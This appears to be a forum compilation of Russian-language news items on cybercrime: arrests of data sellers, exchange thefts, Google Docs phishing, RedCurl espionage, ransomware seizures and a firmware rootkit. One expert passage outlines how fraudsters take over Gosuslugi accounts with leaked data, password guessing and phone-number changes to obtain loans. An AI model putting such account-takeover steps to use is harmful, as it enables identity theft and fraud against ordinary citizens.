После задержания молодой человек признал вину и оказал следствию необходимую помощь. Уголовное дело было возбуждено по фактам использования программ, предназначенных для блокировки информации и нейтрализации средств защиты. Сторона обвинения подчеркивала, что преступление совершено хакером из корыстной заинтересованности.
С учётом признания вины и содействия расследованию, осуждённому назначено наказание в виде года лишения свободы условно с испытательным сроком в полгода. Приговор вступил в законную силу.
Несанкционированный сбыт информации разоблачили работники Департамента киберполиции совместно с Главным следственным управлением Нацполиции.
19-летний житель Киева, студент одного из высших учебных заведений, создал бот в мессенджере для продажи конфиденциальной и другой информации с ограниченными доступом, в том числе персональных данных граждан Украины. Доступ к боту стоил 1 доллар в день или 4 доллара за 20 попыток поиска данных в отношении конкретных лиц. Оплату фигурант получал на крипто-кошелек.
Кроме этого, правонарушитель разрабатывал и внедрял механизм поиска данных по фотографиям людей с использованием искусственного интеллекта. Фотоснимки он загружал из открытых источников Интернета.
В распоряжении фигуранта были базы данных нескольких десятков миллионов граждан. Эти сведения он покупал на тематических хакерских форумах.
По месту проживания правонарушителя сотрудники полиции провели обыски. Изъяты компьютерная техника и мобильные телефоны. Во время осмотра изъятой техники киберполицейские обнаружили базы данных, которые были скомпрометированы в период с 2014-2019 годы. Эти базы вмещали даты рождения, фамилии, имя и отчество граждан, серии и номера паспортов, индивидуальных налоговых номеров налогоплательщиков и номеров телефонов, фотоизображения лиц и т.д.
Киберполицейские изъяли базы персональных данных из незаконного оборота, а также заблокировали учетные записи, которые использовались в противоправной деятельности. Сейчас проводятся компьютерно-технические экспертизы.
Открыто уголовное производство по ч. 2 ст. 361-2 (Несанкционированные сбыт или распространение информации с ограниченным доступом, которая хранится в компьютерах, автоматизированных системах, компьютерных сетях или на носителях такой информации) Уголовного кодекса Украины. Санкция статьи предусматривает до пяти лет лишения свободы.
Следственные действия продолжаются.
Хакеры взломали горячий кошелек зарегистрированной в Лихтенштейне биткоин- биржи LCX. Компания сообщила, что в ходе атаки похищены токены стандарта ERC-20. На время расследования ввод и вывод средств на платформе приостановлен.
__https://twitter.com/x/status/1479997831524110341
По данным аналитиков PeckShield, хакеры вывели с платформы активы общей стоимостью $6,8 млн, включая $3,43 млн в стейблкоине USD Coin (USDC) и $2,22 млн в нативном токене биржи LCX.
__https://twitter.com/x/status/1479983505522425857
Согласно ончейн-данным, большую часть украденных токенов неизвестные уже отправили на адрес сервиса микширования транзакций Tornado Cash. На момент написания в кошельке злоумышленников осталось чуть более $1,07 млн в ETH и LCX.
Биткоин-биржа не сообщила о планах по возвращению украденных средств. Команда платформы подчеркнула, что средства пользователей находятся в безопасности.
Эксперты сообщают о новом тренде фишинговых атак — использовании функции комментирования в «Google Документах» (Google Docs) для отправки электронных писем, которые будут казаться легитимными и заслуживающими доверия.
Поскольку сотрудники многих организаций используют «Google Документы» для совместной работы, уведомления от этого сервиса уже стали чем-то привычным. Именно поэтому новые фишинговые кампании могут стать по-настоящему масштабными.
Помимо большого охвата потенциальных жертв, киберпреступники с помощью «Google Документов» добиваются обхода средств защиты электронной почты. В этих атаках фишинговые письма по факту отправляются именно Google, а это значит, что шанс их детектирования практически равен нулю.
По словам специалистов, фишеры используют этот метод с октября прошлого года. Несмотря на то что Google ранее уже пыталась решить эту проблему, уязвимость до сих пор присутствует и позволяет преступникам атаковать организации.
На последние кибератаки такого рода обратили внимание исследователи из Avanan. Пример потенциально опасного письма, сгенерированного и отправленного Google, эксперты привели на скриншоте:
В комментарии злоумышленники могут указать что угодно: от вредоносных ссылок, по которым на компьютер пользователя загружаются вредоносы, до URL, ведущих на фишинговые сайты, собирающие учётные данные.
Также исследователи обращают внимание на интересную особенность: электронная почта киберпреступников не отображается в уведомлении, получатель видит только имя. Именно поэтому фишерам удаётся качественно имитировать легитимное письмо.
В Avanan предупредили, что та же техника работает и с «Google Презентациями», поэтому сотрудникам компаний стоит быть особенно бдительными при работе с этими двумя сервисами.
• Source: https://www.bleepingcomputer[.]com/...menting-feature-exploited-for- spear-phishing/
Специалисты Group-IB обнаружили новые атаки хакеров RedCurl, обычно занимающихся коммерческим шпионажем и кражей корпоративной документации у компаний из различных отраслей. Теперь «под прицелом» группировки оказался неназванный российский ритейлер, входящий в ТОП-20 крупнейших интернет- магазинов России.
В прошлом году специалисты Group-IB впервые рассказали о русскоязычной хак- группе RedСurl. RedCurl активна как минимум с 2018 года. За это время хакеры совершили 26 целевых атак исключительно на коммерческие организации. Среди них были строительные, финансовые, консалтинговые компании, ритейлеры, банки, страховые, юридические и туристические организации. При этом RedCurl не имела четкой географической привязки к какому-либо региону: ее жертвы располагались в России, Украине, Великобритании, Германии, Канаде и Норвегии. Теперь, спустя семь месяцев, в 2021 году атаки RedСurl возобновились.
«После продолжительного перерыва группа вернулась на арену кибершпионажа. Атакующие показывают глубокие навыки проведения тестов на проникновение, а также разработки вредоносного ПО, способного обходить классические антивирусные средства защиты. А значит, все большее количество компаний будут попадать в список жертв группы, проводящей таргетированные атаки с целью кражи внутренних документов компаний. Шпионаж в коммерческой сфере остается пока еще редким и во многом уникальным явлением. Однако мы не исключаем, что успех данной группы может задать новый тренд на арене киберпреступлений», — говорит руководитель отдела динамического анализа вредоносного кода Group-IB Иван Писарев.
С начала 2021 года Group-IB зафиксировала 4 атаки, в двух из которых идентифицированная жертва находилась в России и была атакована дважды. Так, от рук хакеров пострадал один из крупнейших российских ритейлеров, специализируются на оптовой и розничной торговле в интернете. Обнаружив следы атаки, специалисты Group-IB оперативно связались с жертвой, предоставили данные и проконсультировали о необходимых действиях для локализации и купирования дальнейшего развития инцидента.
Исследователи отмечают, что в период затишья группа провела серьезные улучшения своих инструментов для достижения своей главной цели — хорошо подготовленного шпионажа.
Теперь перед атакой RedCurl еще тщательнее исследуют свою жертву: их «фирменным стилем» является отправка фишинговых писем в разные департаменты организации от имени HR-команды. Однако в новых атаках на ритейл RedCurl пошли еще дальше и осуществили две хорошо подготовленные рассылки — одна была «классической» — от имени HR-департамента организации-жертвы, а вот вторая — уже от имени всем известного госпортала с темой письма — «Возбуждении исполнительного производства». Естественно, данные письма не имели никакого отношения ни к департаменту по работе с персоналом, ни к госучреждениям.
Из примера фишинговых писем видно, что RedCurl активно использует социальную инженерию — заинтересованные темой премирования, сотрудники, конечно, кликают на указанную в письме ссылку.
После заражения компьютера в сети целевой организации, RedCurl собирает информацию об инфраструктуре жертвы. В первую очередь хакеров интересуют версия и название зараженной системы, список сетевых и логических дисков, а также список паролей. По информации Group-IB, на стороне сервера похищенная с зараженной машины информация, IP-адрес и время получения запроса сохраняются в отдельный файл. Интересно, что перед сохранением в файл время корректируется с учетом часового пояса города Минск (UTC+3).
В своих атаках RedCurl не торопится: с момента заражения до кражи данных проходит от 2 до 6 месяцев. Группа не использует классические инструменты постэксплуатации, такие как CobaltStrike или Meterpreter. Также хакеры ни разу не были замечены в использовании стандартных иои общедоступных средств удаленного контроля скомпрометированных устройств. Первоначальное заражение, закрепление на зараженном устройстве, продвижение в сети, кража документов — все это осуществляется за счет самописных и нескольких публичных инструментов. По мнению экспертов, именно поэтому действия и методы RedCurl остаются уникальными для русскоязычной хакерской сцены.
Несмотря на высокий уровень контроля в сети жертвы, группа не занимается шифрованием ее инфраструктуры, не выводит деньги со счетов, не требует выкуп за украденные данные. То есть не делает ничего, чтобы реализовать стандартные для киберкриминала финансовые амбиции. Как правило, это указывает на то, что группа, получает вознаграждение за свою «работу» из других источников. Ее задача — как можно незаметнее добыть ценные сведения.
Прежде всего, RedCurl интересуют: деловая переписка по электронной почте, личные дела сотрудников, документация по различным юридическим лицам, судебным делам и другая внутренняя информация. Даже после окончания атаки жертва может оставаться в неведении, что все ее секреты уже «уплыли» на серверы RedCurl.
• Source: https://www.group-ib.ru/resources/threat-research/red-curl-2.html
Оперативники управления по противодействию киберпреступности УВД Гомельского облисполкома установили хакера, который продавал информацию, добытую преступным путем, сообщили в отделении информации и общественных связей УВД.
19-летний гомельчанин нашел в интернете и приобрел вредоносное программное обеспечение. "С его помощью он взламывал аккаунты пользователей "Яндекса" и проверял их на валидность. Затем находил учетные записи, содержащие любую информацию о пользователях, в том числе личные данные, номера телефонов, бонусные баллы. Весь массив сведений копировал и продавал в сети. Полученные на электронный кошелек деньги хакер тратил на покупку VPN-сервисов и личные нужды", - рассказали в УВД.
Правоохранители устанавливают пострадавших, а также денежные суммы, полученные преступным путем.
В отношении молодого человека возбуждено уголовное дело по ч.1 ст.354 (разработка, использование, распространение либо сбыт вредоносных компьютерных программ или специальных программных или аппаратных средств) УК. Санкции статьи предусматривают наказание вплоть до лишения свободы до трех лет.
Фигурант нигде не работает, ранее не судим.
Правоохранители задержали в Москве троих мужчин по обвинению в том, что те за деньги осуществляли поиск личных данных частных лиц, которые потом были использованы Алексеем Навальным при осуществлении его расследований. Об этом ТАСС сообщил источник в правоохранительных органах.
"Задержаны Петр Катков, Александр Зеленцов и Игорь Зайцев. Они занимались тем, что с помощью "темного интернета" (Darknet) искали клиентов, которым необходимо получить телефон, адрес или иные личные данные того или иного человека и оказывали ему за деньги соответствующую услугу. Для этого они пользовались в том числе и поддельными документами сотрудников полиции. Некоторые сведения, которые были добыты задержанными, были использованы Навальным для одного из его расследований", - сказал собеседник агентства.
По его словам, Катков, Зайцев и Зеленцов не знали, что одним из их "клиентов" является Навальный. "Их использовали, как говорится, "в темную". В настоящее время всем троим предъявлены обвинения в подделке документов и нарушении тайны телефонных переговоров", - отметил источник ТАСС.
В Басманном суде Москвы ТАСС сообщили, что Катков, Зеленцов и Зайцев отправлены под домашний арест. "Им предъявлены обвинения по ст. 327 УК РФ ("Подделка, изготовление или оборот поддельных документов") и ст. 138 УК РФ ("Нарушение тайны переписки или телефонных переговоров")", - отметили в суде, отказавшись от других комментариев.
По данным источника ТАСС в правоохранительных органах, Зеленцов до своего задержания был частным детективом. "Он основал одно из частных детективных агентств в Москве. Сейчас следствие проверяет, использовались ли возможности этой организации для получения сведений, которые потом использовал Навальный",
Как следует из открытых источников, человек с именем и фамилией Александр Зеленцов основал детективное агентство ООО "ЛЕКС-ГАРД". В этой организации ТАСС подтвердили, что Зеленцов является учредителем этого агентства, но от каких-либо комментариев отказались.
По словам источника в правоохранительных органах, мужчину считают причастным к деятельности преступной группы, которая занималась торговлей лесоматериалами и незаконно уходила от уплаты налогов.
Правоохранители в Санкт-Петербурге установили причастность руководителя отдела экономической полиции Колпинского района города к обналичиванию более 500 млн рублей. От налогов уводились деньги, полученные от торговли лесоматериалами, сообщил во вторник ТАСС источник в правоохранительных органах.
"В результате оперативных мероприятий сотрудники управления собственной безопасности петербургского ГУ МВД совместно с коллегами из регионального УФСБ России установили причастность к организации серой банковской схемы руководителя отдела экономической полиции Колпинского района", - рассказал собеседник агентства. Он уточнил, что деятельность самой группы теневых банкиров была пресечена еще в 2020 году, тогда же следственными органами СК России было возбуждено уголовное дело по статье 172 УК РФ ("Незаконная банковская деятельность").
Нелегальный бизнес был создан в 2018 году. Злоумышленники основали несколько юрлиц для торговли лесоматериалами. Полученные от продажи леса деньги транзитом переводились по цепочкам подконтрольных фирм и в конечном пункте поступали на счета под договоры займа. Так дельцы уходили от уплаты налогов. За два года они обналичили не менее 400 млн рублей. Себе организаторы схемы оставляли 4% от суммы, таким образом их заработок составил не менее 16 млн рублей.
Кроме того, участники преступной группы предоставляли услугу обналичивания средств через кассу кредитного учреждения с последующей инкассацией клиенту - за это они оставляли себе уже 9% от суммы "обнала". По соответствующей схеме, как установили оперативники, было дополнительно обналичено 140 млн рублей, а доход злоумышленников составил более 12,5 млн рублей. По данным источника, оперативники выявили также нарушения в осуществлении самой торговли лесоматериалами.
В настоящее время устанавливаются иные лица, причастные к незаконной схеме, в том числе из числа коллег задержанного полицейского. Материалы совместной оперативной работы правоохранителей переданы в органы Следственного комитета для проведения процессуальных действий в рамках уголовного дела.
В Дагестане задержали 18-летнего хакера, наладившего схему оформления микрокредитов на граждан по всей стране
Полицейские выяснили, что подозреваемый купил в интернете базу данных, содержащую пароли, логины и личные данные как минимум 100 человек из разных городов. Затем он находил людей в соцсетях и искал информацию о них в открытых источниках. После этого хакер подбирал пароли (обычно они были простыми) и под видом потерпевших заходил на портал «Госуслуги», где оформлял кредиты. Затем он переводил деньги на свой счет, на чем и попался.
На данный момент известно о четырех жителях Югры и шести гражданах других регионов России, которые пострадали от действий хакера. Общий ущерб составил около 100 тыс. рублей.
Своими жертвами хакер выбирал людей с аккаунтами без двухфакторной аутентификации и минимальной кредитной нагрузкой. Сейчас оперативники проверяют дагестанца на причастность к другим преступлениям — пострадавших может быть больше.
Как объяснил «Известиям» руководитель Лаборатории стратегического развития
продуктов кибербезопасности аналитического центра «Газинформсервис» Дмитрий
Овчинников, данные о личности человека можно получить из разных источников.
Прежде всего это базы, где содержится частичная информация — например, база по
наследственным делам, слитые базы онлайн-магазинов, служб доставки. Существуют
и сводные базы данных, скомпилированные из нескольких официальных. Их можно
купить в даркнете за сравнительно небольшие деньги.
— Обычно в таких базах содержатся СНИЛС, паспортные данные, телефонные номера
и другая персональная информация. Купив доступ, мошенник начинает подбирать
себе жертву. Сбор информации можно продолжить, например, в соцсетях. Оттуда
можно узнать много информации, чтобы получить подсказку для угадывания пароля
— имя ребенка, кличка животного и другое. Далее можно попробовать взломать
доступ к «Госуслугам» при помощи перебора пароля и номера СНИЛС,
— рассказывает Овчинников.
В случае если человек давно не пользовался «Госуслугами», то у него может быть не настроен вход с подтверждением, ставший обязательным с 2023 года. Зайдя на портал, мошенник может поменять номер в личном кабинете и начать оформлять кредиты на пользователя, а затем вывести деньги на свои счета.
— Другой сценарий — взлом электронной почты, к которой привязан аккаунт в «Госуслугах». И попробовать войти в аккаунт через легитимную процедуру восстановления учетной записи с подтверждением через отправку на почту.
МВД России предлагает обязать банки и кредитные организации предоставлять
правоохранителям запрашиваемую ими информацию, в том числе о переводах
цифровых денег, не позднее трех рабочих дней, а при технической возможности -
в течение суток. Об этом ТАСС сообщили в пресс-центре МВД России.
https://tass.ru/ekonomika/17627623
Ведомство разработало проект соответствующего федерального закона.
"Законопроектом предлагается дополнить статью 21 УПК РФ положением,
устанавливающим новые обязанности операторов по переводу денежных средств,
операторов по переводу электронных денежных средств и операторов связи. <...>
Они будут должны предоставлять необходимую информацию не позднее трех рабочих
дней с момента их поступления или в указанный в запросе сотрудников
правоохранительных органов срок", - сказали в пресс-центре.
В МВД добавили, что при наличии технической возможности эти запросы будут направлены в форме электронного документа. "Запросы, направленные в форме электронного документа, которые могут быть обработаны посредством автоматизированных информационных систем указанных операторов, будут подлежать исполнению в течение 24 часов с момента их поступления, если иные сроки не установлены федеральными законами", - подчеркнули в ведомстве.
Порядок взаимодействия операторов по переводу денег, операторов электронных денег, операторов связи с заинтересованными федеральными государственными органами при исполнении вышеназванных запросов будет устанавливаться правительством России.
Следователем СЧ по РОПД СУ УМВД России по Тверской области окончено предварительное расследование уголовного дела в отношении участников межрегиональной организованной группы, которые обвиняются в мошенничестве и кражах денежных средств дистанционным способом.
«Следствием установлено, что соучастники звонили на телефоны жителей Тверской области, а также других регионов России и представлялись работниками кредитных организаций. Они сообщали гражданам заведомо ложную информацию о попытке оформления потребительского кредита. Под мнимым предлогом защиты сбережений предлагали потерпевшим перевести деньги на «безопасный», «резервный» либо «страховой» счёт, который на самом деле был подконтролен сообщникам. Кроме того, они получали удалённый доступ к счетам, с которых впоследствии также списывались денежные средства», – рассказала официальный представитель МВД России Ирина Волк.
Среди соучастников были чётко распределены роли. В результате их деятельности 177 потерпевшим причинён ущерб на общую сумму свыше 161 миллиона рублей. Уголовное дело было возбуждено по признакам преступлений, предусмотренных статьями 158 и 159 УК РФ.
«Противоправная деятельность была пресечена сотрудниками Управления уголовного розыска УМВД России по Тверской области. 14 фигурантов задержаны и заключены под стражу.
В настоящее время уголовное дело с утверждённым обвинительным заключением направлено в Октябрьский районный суд г. Улан-Удэ Республики Бурятия для рассмотрения по существу», – сообщила Ирина Волк.
В пресс-релизе от 12 февраля 2024 года компания Freenom — регистратор доменных имён, управлявшая доменами в зонах .tk, .cf, .gq, (в прошлом также .ga и .ml) — объявила об урегулировании иска с Meta* и своём прекращении работы.
Freenom в рамках управления доменными зонами ранее предоставляла возможность
бесплатной регистрации доменов верхнего уровня в зонах .tk (Токелау), .ml
(Мали), .cf (Центральноафриканская Республика), .ga (Габон) и .gq
(Экваториальная Гвинея).
Проблемы у Freenom начались в конце 2022 года — начале 2023-го, когда Meta*
подала иск к компании в связи с тем, что домены в этих зонах зачастую
использовались киберпреступниками, составляя более половины фишинговых доменов
в национальных доменах верхнего уровня.
«Пять ccTLD, пользующихся услугами Freenom, предпочтительны для киберпреступников, так как Freenom регистрирует доменные имена бесплатно и скрывает личность своих клиентов даже после предоставления доказательств использования имён в в незаконных целях» — сообщалось в иске к компании. В связи с этим
Freenom убрала возможность регистрации новых доменов в управляемых ею доменных зонах.
sx: freenom.com/en/freenom_pressstatement_02122024_v0100.pdf
Разработчики ExpressVPN предупредили, что вынуждены удалить из своего приложения раздельное туннелирование. Дело в том, что эта функциональность оказалась связана с багом, который раскрывал домены, посещаемые пользователями.
Ошибку обнаружили сотрудники CNET, и она присутствовала только в Windows- версиях ExpressVPN (с 12.23.1 по 12.72.0), выходивших в период с 19 мая 2022 года по 7 февраля 2024 года. Проблема затрагивала только тех, кто использовал функцию раздельного туннелирования, которая позволяет выборочно направлять часть интернет-трафика в VPN-туннель или в обход него, обеспечивая гибкость для тех, кому нужен одновременно локальный и защищенный удаленный доступ.
Уязвимость приводила к тому, что DNS-запросы пользователей попадали не в инфраструктуру ExpressVPN, как должно было быть, а к интернет-провайдеру пользователя.
Так, обычно все DNS-запросы выполняются через DNS-сервер ExpressVPN, который не хранит логи, чтобы провайдеры и другие организации не могли отслеживать домены, которые посещает человек. Из-за обнаруженной ошибки некоторые DNS- запросы отправлялись на DNS-сервер, заданный в системе пользователя (обычно, это сервер провайдера), что позволяло провайдеру отслеживать, какие сайты посещает клиент.
Фактически это означает, что из-за утечки DNS-запросов Windows-пользователи ExpressVPN с активным раздельным туннелированием раскрывали всю свою историю просмотров третьим лицам.
«Ошибка позволяла некоторым из DNS-запросов пользователя отправляться на сторонний сервер, которым в большинстве случаев выступал интернет-провайдер. Это позволяло провайдеру видеть, какие домены посещает пользователь, например google.com, хотя провайдер по-прежнему не мог видеть отдельные веб- страницы, поисковые запросы или другое поведение пользователя в интернете. Все содержимое интернет-трафика пользователя оставалось зашифровано и недоступно для просмотра провайдером или любой другой третьей стороной», — сообщают разработчики ExpressVPN.
Click to expand...
ExpressVPN утверждает, что проблема затронула только около 1% Windows- пользователей, и воспроизвести ее удалось только в режиме раздельного туннелирования.
Теперь пользователям ExpressVPN версий с 12.23.1 по 12.72.0 рекомендуют как можно скорее обновить свой клиент до новейшей версии (12.73.0). В этой версии функция раздельного туннелирования попросту удалена. Однако ExpressVPN заявляет, что в будущем, когда ошибка будет исправлена, функция заработает вновь.
В Хакасии задержали группу криптомошенников.
Как минимум 12 потерпевших из разных регионов России перечислили мошенникам от 100 тыс. до 300 тыс. рублей
Полицейские Хакасии задержали группу подозреваемых в мошенничестве под предлогом продажи криптовалюты, сообщила официальный представитель МВД России Ирина Волк.
Как сообщается, сотрудники отдела по борьбе с противоправным использованием информационно-коммуникационных технологий МВД по Республике Хакасия задержали семерых жителей региона. Они подозреваются в серии дистанционных мошенничеств, совершенных организованной группой с причинением значительного ущерба.
По предварительным данным, злоумышленники «оформили на свои имена по несколько аккаунтов на популярных криптобиржах» и размещали в Сети объявления о продаже цифровых активов. После получения предоплаты они переставали выходить на связь с покупателем. Ведомство не раскрывает деталей мошеннической схемы, но в кадрах видео задержания подозреваемых можно рассмотреть на их ноутбуках открытые сайты p2p-платформ на MEXC и других криптобиржах.
Следователи располагают информацией о как минимум 12 потерпевших из разных регионов России, каждый из которых перечислил мошенникам от 100 тыс. до 300 тыс. рублей.
Полицейские при поддержке сотрудников Росгвардии провели обыски по местам проживания подозреваемых и в арендованной квартире, «которую использовали как кол-центр». Обнаружены и изъяты более 50 сим-карт, средства связи, компьютерная техника, банковские карты, автомобили и другие предметы, имеющие доказательственное значение.
В отношении подозреваемых избрана мера пресечения в виде заключения под стражу и возбуждено уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ.
Суд дал 12 лет экс-главе наркоотдела МВД Мордовии за взятку биткоинами
Верховный суд Мордовии приговорил к 12 годам лишения свободы бывшего
начальника отдела управления по контролю за оборотом наркотиков МВД республики
за коррупцию.
Экс-полицейский признан виновным в получении взятки и будет отбывать наказание
в колонии строгого режима. Он лишен звания подполковник полиции и оштрафован
на 12,8 миллиона рублей.
Суд установил, что в июле 2022 года полицейский за предоставление служебной
информации получил взятку в виде биткоина, который был ему перечислен на
криптокошелек. Его взяли с поличным при переводе первого транша взятки на
общую сумму 2,5 миллиона рублей.
Заявление о преступлении поступило в полицию 16 октября, сообщила Ляэнеская префектура.
Проживающая в Пярну женщина сообщила, что в начале октября с ней связалась через WhatsApp говорившая по-русски женщина, которая представилась сотрудницей полиции. Она утверждала, что в банк обратился мошенник, который попытался взять кредит на имя потерпевшей, и теперь необходима ее помощь для проведения различных действий с целью задержать мошенника.
В результате женщину уговорили установить программу Any Desk, посредством которой на имя потерпевшей были взяты кредиты, совершены на счета неизвестных лиц и прочие сделки с ее счетами.
Причиненный ущерб первоначально оценивается в 35 000 евро.
С 15 по 17 октября 2023 года в Центре инноваций Интерпола в Сингапуре состоялась Глобальная конференция по вопросам борьбы с киберпреступностью. В мероприятии приняла участие российская делегация во главе с начальником Национального центрального бюро Интерпола МВД России генерал-майором полиции Валерием Калачевым.
Конференция объединила представителей региональных полицейских организаций, международных организаций и руководителей правоохранительных органов зарубежных стран.
В ходе форума его участники обсудили вопросы, связанные с сотрудничеством в сфере противодействия киберугрозам и обеспечением международной информационной безопасности. В качестве ключевой темы обозначено укрепление взаимодействия правоохранительных органов разных стран в борьбе с новыми видами киберпреступлений, совершаемых транснациональными организованными группировками.
Выступившие спикеры отметили, что цифровая инфраструктура облегчила преступникам использование новых технологий для совершения киберпреступлений. Подчеркнута важность международного сотрудничества с зарубежными партнерами, в том числе в рамках Интерпола, для эффективного пресечения деятельности мошеннических синдикатов и, в конечном счете, возврата похищенных денежных средств.
В представленном на конференции анализе ситуации отмечается, что, как правило, жертвам киберпреступников рассылаются электронные письма, содержащие ссылки, при переходе по которым осуществляется сбор информации о кредитных картах или личных данных пользователей. В результате подобных действий пострадали свыше 70 тысяч человек из 43 стран.
Участники Глобальной конференции Интерпола наметили совместные дальнейшие действия по планированию, координации и проведению будущих мероприятий, направленных на борьбу с киберпреступностью.
source:
mvdmedia.ru/news/official/rossiyskaya-delegatsiya-prinyala-uchastie-v-
globalnoy-konferentsii-interpola-po-voprosam-borby-s-kib
• Тысячи американских ИТ-работников отправляли миллионы долларов зарплаты в
Северную Корею.
• ФБР и Министерство юстиции США раскрыли схему, в которой северокорейские
работники использовали фальшивые удостоверения личности.
• Деньги направлялись на северокорейскую оружейную программу.
• Арестованы 1,5 млн долларов и 17 доменных имен.
• ФБР рекомендует работодателям проверять удаленных ИТ-работников.
• Северная Корея отправила тысячи ИТ-работников в Китай и Россию для обмана
американских компаний.
• Северокорейские работники проникали в компьютерные сети и крали информацию.
• Напряженность на Корейском полуострове растет из-за многочисленных ракетных
испытаний Северной Кореи.

](https://www.theguardian.com/world/2023/oct/19/north-korea-remote-us-workers- missile-program)
Authorities say thousands of people dispatched by North Korea to work for US companies fed millions of dollars to missile program
www.theguardian.com
Злоумышленники заработали около 14 млн гривен на продаже украденного.
Кибердепартамент Службы безопасности Украины (СБУ) ликвидировал группу хакеров, которая украла аккаунты около 30 миллионов человек. Банда выставляла украденные аккаунты на продажу в дарквебе, и, по данным СБУ, заработала на продаже почти 14 миллионов гривен. Злоумышленники получали деньги через ЮMoney, Qiwi и WebMoney, которые запрещены в Украине.
Чтобы собрать такое количество данных, злоумышленники активно распространяли вредоносное ПО в украинских и европейских системах. Во время обысков правоохранительные органы изъяли несколько жестких дисков с персональными данными граждан, компьютерную технику, мобильные телефоны, сим-карты и флеш- накопители, на которых содержались все доказательства противоправной деятельности.
В настоящее время хакерам грозит обвинение по по ч. 1 ст. 361-2 (Несанкционированные сбыт или распространение информации с ограниченным доступом, которая сохраняется в электронно-вычислительных машинах (компьютерах), автоматизированных системах, компьютерных сетях или на носителях такой информации) Уголовного кодекса Украины.
Министерство юстиции США объявило об изъятии около 500 000 долларов в биткоинах, которые ранее были выплачены американскими поставщиками медицинских услуг операторам шифровальщика Maui.
Ранее в этом месяце американские правоохранители уже предупреждали об активности Maui, который целенаправленно атакует медицинские организации и общественное здравоохранение. Тогда сообщалось, что Maui использует комбинацию AES, RSA и XOR для процесса шифрования: файлы шифруются с помощью AES с использованием уникального ключа, который затем шифруется с помощью пары ключей RSA, сгенерированной при первом запуске малвари, а затем открытый ключ RSA шифруется с использованием другого жестко закодированного открытого ключ RSA.
Эксперты предполагали, что вся вредоносная кампания строится на готовности медицинских учреждений платить выкуп, так как им требуется быстро восстановиться после атаки и обеспечить бесперебойный доступ к критически важным данным и услугам, ведь от них зависят жизни и здоровье людей.
Как теперь поясняет Минюст, обнаружение этой малвари произошло после инцидента в больнице Канзаса, о котором пострадавшие поспешили сообщить в ФБР. В мае 2021 года это медицинское учреждение заплатило вымогателям около 100 000 долларов за восстановление данных после атаки шифровальщика.
«Благодаря быстрому сообщению и сотрудничеству со стороны жертвы, ФБР и Министерство юстиции пресекли деятельность группы, спонсируемой Северной Кореей, которая разрабатывает программу-вымогатель, известную как Maui, — говорит заместитель генерального прокурора ЛизаМонак. — Это не только позволило нам вернуть выкуп, но также вернуть выкупы, выплаченные ранее неизвестными жертвами, и идентифицировать ранее неизвестный нам вид программы- вымогателя».
Благодаря быстрому сообщению об инциденте, правоохранители сумели отследить еще один платеж в размере 120 000 долларов от неназванного поставщика медицинских услуг в Колорадо. В итоге два эти платежа, а также неизвестное количество платежей на сумму 280 000 долларов США, были изъяты в мае 2022 года, и общая сумма возращенных средств составила примерно полмиллиона долларов США.
В настоящее время неизвестно, как было организовано изъятие средств. Вероятно, правоохранители смогли отследить средства жертв, которые пытались отмыть преступники, до некой криптовалютной биржи, которая предлагает услуги обналичивания и конвертации криптовалют в фиат.
Хотя возвращенная на этот раз сумма невелика, подчеркивается, что произошедшее демонстрирует, как быстрое информирование об инцидентах позволяет правоохранительным органам быстрее и легче отслеживать денежные следы, возвращать выкупы, а также идентифицировать злоумышленников и их тактики.
source: justice[.]gov/opa/pr/justice-department-seizes-and-forfeits- approximately-500000-north-korean-ransomware-actors
отмывать миллионы долларов в криптовалютном эквиваленте с помощью различных махинаций с банковскими счетами. Теперь ему грозит 11 лет тюремного заключения и штраф в 30 миллионов долларов.
В своем пресс-релизе Министерство юстиции США (DOJ) объявило о приговоре, вынесенном Галебу Алаумари, американцу канадского происхождения, ставшему ключевой фигурой в переводе средств северокорейским военным хакерам.
В начале 2020-го DOJ обвинил трех северокорейских сотрудников военной разведки за кражу 1,3 миллиарда долларов при помощи кибератак и вымогательств, включая кражу 100 миллионов долларов у различных крипто компаний и спланированную атаку на кинокомпанию Sony Pictures в качестве “ответа” за пародийный фильм “Интервью” о северокорейской диктатуре.
В том же 2020-м Галеб Алаумари, живущий в Онтарио, признался в сговоре с целью отмывания денежных средств для Северной Кореи в 2018 году. Он был ключевым звеном в отмывании незаконно полученных денег, обналичивая их при помощи банкоматов, а также подключая к этому процессу третьих лиц. Хакеры сумели обойти защиту BankIslami, украв у коммерческого пакистанского банка около 6,1 миллиона долларов.
Помимо сотрудничества со взломщиками из Северной Кореи Алаумари признался в работе на других “клиентов”. По одному из поступивших ему запросов американец провернул мошенническую схему с цепочкой электронных писем с одним из канадских университетов, представившись сотрудником строительной компании. На этой “сделке” ему удалось получить от университета перевод на 9,4 миллиона долларов. Среди прочих пострадавших также числятся несколько азиатских банков и британский футбольный клуб.
В Министерстве юстиции США уточнили, что после получения средств на счет, Алаумари отмывал их при помощи банковских переводов и последующего обмена в эквивалент различных цифровых валют. Благодаря его усилиям из страны были выведены десятки миллионов долларов, украденных у различных местных и международных организаций. В общей сумме, по оценке аналитиков Chainalysis Северная Корея украла с бирж более 1,75 миллиарда долларов.
Что же касается северокорейских хакеров, то они по-прежнему на свободе и вряд ли США сможет добиться их экстрадиции. Причиной этого является не только отсутствие соглашения об экстрадиции, но и натянутые отношения с КНДР. Хотя в этом году США впервые выполнили экстрадицию гражданина КНДР, который находился в Малайзии.
Когда ты с Groove и пытаешься уйти в белую. (God bless America)
Источник: [https://thecoinshark.net/ru/cyberse...m-dprk-to-launder-money-into- cryptocurrencies](https://thecoinshark.net/ru/cybersecurity/american-helped- hackers-from-dprk-to-launder-money-into-cryptocurrencies)
Специалисты иранской ИБ-компании Amnpardaz обнаружили первый в своем роде руткит, скрываемый в прошивке устройств HP iLO и использующийся в реальных атаках для удаления данных с серверов иранских организаций.
Руткит iLOBleed атакует HP iLO (Integrated Lights-Out) – аппаратные устройства для управления серверами в условиях отсутствия физического доступа к ним. iLO оснащены собственным процессором, хранилищем данных, оперативной памятью и сетевой картой и работают отдельно от любой локальной операционной системы.
Главным предназначением этих устройств является обеспечение системным администраторам связи с удаленными системами, даже с отключенными, чтобы они могли выполнять операции по обслуживанию (обновление прошивки, установка обновление безопасности, переустановка системы и пр.).
Эти функции сделали карты iLO одним из самых успешных корпоративных продуктов для удаленного управления парком компьютеров и автоматического развертывания образов ОС во многих современных дата-центрах.
По словам специалистов Amnpardaz, начиная с 2020 года, они расследовали несколько инцидентов, когда неизвестные злоумышленники использовали iLO для того, чтобы «пережить» переустановку ОС и сохранить постоянство в атакуемой сети.
